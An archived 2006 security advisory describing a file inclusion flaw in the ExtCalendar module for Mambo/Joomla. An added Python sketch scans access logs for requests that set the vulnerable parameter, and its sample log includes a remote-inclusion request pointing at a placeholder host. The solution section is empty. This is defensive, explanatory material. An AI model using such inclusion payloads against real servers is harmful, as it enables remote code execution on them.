Monday, 15 March 2010 | Online since 2005
 
 
ExtCalendar | File Inclusion Vulnerability

ExtCalendar Module for Mambo/Joomla "mosConfig_absolute_path" File Inclusion Vulnerability
Advisory ID : FrSIRT/ADV-2006-2711
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-09

Technical Description
A vulnerability has been identified in ExtCalendar (module for Mambo/Joomla), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "extcalendar.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.
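
A detection sketch for the condition described above, added here as an example and not taken from the advisory or from ExtCalendar: because "mosConfig_absolute_path" is a server-side configuration variable, any request that supplies it in the query string is worth reporting. The log entries, the placeholder script path and the host names are constructed, and the `classify` and `scan` helpers are hypothetical names.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "mosConfig_absolute_path"  # parameter named in the advisory
# Request portion of an Apache/Nginx "combined" access-log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) [^"]*"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A URL or stream-wrapper scheme (http:, ftp:, php:, ...); requires two or more
# characters before the colon so a Windows drive letter is not counted.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.I)

def classify(line):
    """Return a finding dict if the request supplies PARAM, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qsl URL-decodes names and values once, so %3A%2F%2F is seen as ://
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:
            # The variable is server-side configuration; a client has no
            # legitimate reason to send it, so every occurrence is reported.
            remote = bool(SCHEME_RE.match(value.strip()))
            return {"ip": m.group("ip"), "path": url.path,
                    "status": int(m.group("status")),
                    "kind": "remote" if remote else "local", "value": value}
    return None

def scan(log_text):
    """Classify every line and return only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

# Constructed sample entries (documentation IP ranges, placeholder script path).
SAMPLE_LOG = """\
198.51.100.7 - - [09/Jul/2006:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jul/2006:10:02:40 +0000] "GET /PLACEHOLDER/extcalendar.php?mosConfig_absolute_path=http%3A%2F%2Fhost.invalid%2Fx.txt%3F HTTP/1.1" 200 312 "-" "-"
203.0.113.9 - - [09/Jul/2006:10:02:55 +0000] "GET /PLACEHOLDER/extcalendar.php?mosConfig_absolute_path=/tmp/ HTTP/1.0" 404 210 "-" "-"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["kind"], hit["path"], repr(hit["value"]))
```

Access logs record only the query string, so a parameter sent in a request body would not appear in this scan.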

Affected Products
ExtCalendar (module for Mambo/Joomla) version 0.9.1 and prior

Solution to the "mosConfig_absolute_path" File Inclusion Issue


 